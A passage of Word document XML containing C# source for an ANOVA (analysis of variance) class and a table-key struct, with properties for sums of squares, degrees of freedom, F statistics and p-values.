      </w:r>
    </w:p>
    <w:p w14:paraId="5ECAAFD8" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20C8D799" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">    public struct </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>FTableKey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5403D229" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A256F9" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">        int col;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEF4D66" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">        int row;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66790BB5" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">        public </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>FTableKey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>int col, int row)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC30DCC" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F52C4A" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>this.col</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> = col;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B10346" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>this.row</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> = row;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D77FF3" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30548038" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C7B03F" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">    public class </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>Anova</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6BC13ACC" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF9A31C" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">        public double SS </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>{ get</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F364E0" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">        public double </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>SSa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>{ get</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0971E163" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">        public double </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>SSe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>{ get</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E037C1" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00F14744" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00F14744">
        <w:t>/// &lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD5112">
        <w:t>summary</w:t>
      </w:r>
      <w:r w:rsidRPr="00F14744">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C7C812" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F14744">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>/// Общее число наблюдений</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F53362D" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">        /// &lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>summary</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16523BCF" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">public int n </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>{ get</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCD3768" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">        public double </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>avgX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>{ get</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD38E5D" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">        public int </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>dfA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>{ get</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610949BE" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">        public int df </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>{ get</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5EF48F" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">        public double </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>MSa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>{ get</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D8F96D" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">        public double </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>MSe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>{ get</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE59E85" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">        public double F </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>{ get</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FF1893" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        public double </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>Fcrit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>{ get</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5EAB74" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">        public double p </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>{ get</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE431C6" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">        public double </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>Frnk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>{ get</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>; set; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065627FD" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">        public double </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>Prnk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>{ get</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>; set; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3248CB16" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">        public </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>Anova</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>OneFactorData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>[] groups)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA3CAFB" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAEDDAA" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>dfA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>groups.Length</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> - 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727AC4D5"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6ADE05CE" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6291955D" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">                n += </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>group.Length</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061BEF6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78BCC584" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF25D7F"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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>obs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F9DDC6" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BDF2E3" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261BAEFB" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            df = n - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>groups.Length</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1495B9"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n;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C09913" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EBD3097"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2AFDDDA9" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682D56D6" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">                int </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>ni</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>group.Length</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6943A8" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">                double </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
